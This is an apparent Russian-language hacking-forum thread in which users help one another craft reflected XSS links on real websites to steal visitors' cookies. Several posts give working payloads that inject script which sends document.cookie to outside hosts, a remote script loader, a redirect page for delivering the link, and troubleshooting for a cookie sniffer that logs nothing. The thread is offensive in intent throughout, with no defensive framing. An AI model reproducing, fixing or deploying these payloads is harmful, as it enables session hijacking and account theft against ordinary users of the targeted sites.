помогите с Xss
 

короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли?

site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script>

и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?

да ты все верно понял но мне кажется лутше делай так:

1) site.com"><script%20src=http://xss-xss.nm.ru/js.js></script>
js.js
img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;
2) Или залей на какуюто страницу лутше index.htm

<script language="JavaScript">
document.location.href="http://site.com'><script%20src=http://xss-xss.nm.ru/js.js></script>";
</script>

кажысь так все у тебя получится

да,я так пробывал тока вот чёто неприходили данные.На халявных хостах будет пахать?

должно ... если у тебя неполучится на фрее-хостах попробуй ачатовской сниффер.)

а смотрите,я сделал себе снифф на ачате http://antichat.org/s/***/log.php
какой адресс замой картинки то?

и ещё,я вот ищу хсс спомощью проги Acunetix 4
и он находит хсс в "/",возможно ли её осуществить,если да то как?

попробуй так:
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>

Ребят скажите почему это не работает:
Вызов из ява-скрипта :
<script>
img = new Image();
img.src = "http://адрес/sniffer.gif?"+document.cookie;
</script>
пробовал так, создал файлик html, его содержание:
<br>
<br>
<a href="http://google.com">google</a><br>
<script>
img = new image();
img.src = "http://адрес/sniffer.gif?"+document.cookie;
</script>
<br>

На снифер ничего не приходит, почему скажите пожалуйста...Читал много, все одно и тоже, но не фига...снифер Kanickа...

Только зачем страница с XSS где ты нашел, не пойму!?